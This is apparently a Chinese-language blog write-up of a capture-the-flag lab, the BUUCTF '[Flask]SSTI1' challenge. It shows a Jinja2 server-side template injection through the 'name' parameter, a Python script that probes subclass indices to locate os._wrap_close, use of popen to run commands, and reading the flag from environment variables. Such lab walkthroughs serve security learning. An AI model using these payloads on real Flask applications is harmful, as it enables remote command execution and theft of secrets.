[Flask]SSTI1

根据题目提示,这关应该是基于Python flask的模版注入,进入靶场环境后就是一段字符串,而且没有任何提示,有点难受,主要是没有提示注入点

[Flask]SSTI1_第1张图片

 随机尝试一下咯,首先尝试一下guest,GET传参

但是没有反应,难道是POST?

[Flask]SSTI1_第2张图片

 直接报错,说明不是的,接着尝试一下name

[Flask]SSTI1_第3张图片

 name传参回显成功,并成功验证为flask

[Flask]SSTI1_第4张图片

 但是到这里就有点奇怪,页面没回显了,一开始我以为是有过滤存在,但是一直没有成功

[Flask]SSTI1_第5张图片

 最后查看了一下wp,结果是在源码中才看得到回显结果,既然有回显那就继续注入

[Flask]SSTI1_第6张图片

 

 查看所有类后,我们接着用一个python代码去寻找我们需要的os类

 

import requests

for i in range(500):
    url = "http://node4.buuoj.cn:25499/?name={{().__class__.__base__.__subclasses__()["+str(i)+"]}}"
    try:
        response = requests.get(url = url)
        if response.status_code == 200:
            
            if 'os._wrap_close' in response.text:
                print(i)
                print(response.text)
    except:
        pass

 得知类的下标位置后,我们就可以直接访问咯

[Flask]SSTI1_第7张图片

 [Flask]SSTI1_第8张图片

 调用popen函数,以便执行命令

[Flask]SSTI1_第9张图片

但是在查看所有文件后,没有发现flag文件

[Flask]SSTI1_第10张图片

完全找不到flag信息 

[Flask]SSTI1_第11张图片

最后经过查看wp,得知flag信息在env文件下,也可以说在flask的环境变量下

[Flask]SSTI1_第12张图片

 

env

env是Flask一个用于存储环境配置信息的对象。

在Flask中,env用于存储应用程序的配置信息。env的配置信息可以通过多种方式设置,包括从环境变量、配置文件、命令行参数等获取。

你可能感兴趣的:(flask,python,后端)